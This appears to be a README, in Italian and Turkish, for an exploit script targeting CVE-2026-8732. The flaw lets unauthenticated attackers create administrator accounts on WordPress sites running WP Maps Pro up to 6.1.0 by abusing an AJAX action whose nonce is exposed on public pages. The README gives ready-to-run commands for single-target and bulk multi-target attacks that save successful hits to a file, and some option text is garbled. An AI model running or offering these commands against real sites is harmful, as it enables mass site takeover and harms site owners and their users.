
CVE-2026-8732 | WP Maps Pro <= 6.1.0 Creazione Admin Non Autenticata
CVE-2026-8732 è una vulnerabilità critica (CVSS 9.8) nel plugin WordPress WP Maps Pro (wp-google-map-gold) (versione <= 6.1.0).
Attaccanti non autenticati possono creare account amministratore WordPress abusando dell'azione AJAX wpgmp_temp_access_ajax. Il nonce che protegge l'endpoint è incorporato pubblicamente nelle pagine frontend, rendendolo inefficace come meccanismo di controllo degli accessi.
Autori: fientix & quake
-l).-t).-o).--timeout).-v).# Scansione di un Singolo Target
python CVE-2026-8732.py -u https://example.com -v
# Scansione Bulk Multi-Target e Salvataggio Risultati
python CVE-2026-8732.py -l targets.txt -t 20 -o success.txt
# Timeout Personalizzato (Secondi)
python CVE-2026-8732.py -l targets.txt --timeout 15
CVE-2026-8732, WP Maps Pro (wp-google-map-gold) WordPress eklentisinin <= 6.1.0 sürümlerinde bulunan kritik düzeyde (CVSS 9.8) bir zafiyettir.
Yetkisiz saldırganlar, wpgmp_temp_access_ajax AJAX eylemini kötüye kullanarak yetkisiz şekilde yönetici (admin) hesabı oluşturabilirler. İsteği koruması gereken nonce değeri ön yüzde herkese açık olarak yayınlandığından erişim kontrolü işlevini yitirmektedir.
Yazarlar: fientix & quake
-l).-t).-o).--timeout).-v).# Tek Hedef Taraması
python CVE-2026-8732.py -u https://example.com -v
# Çoklu Hedef Taraması ve Sonuçları Kaydetme
python CVE-2026-8732.py -l targets.txt -t 20 -o success.txt
# Özel Zaman Aşımı Süresi (Saniye)
python CVE-2026-8732.py -l targets.txt --timeout 15
"Grazie mille per il tuo supporto su questo progetto, @Quake-py"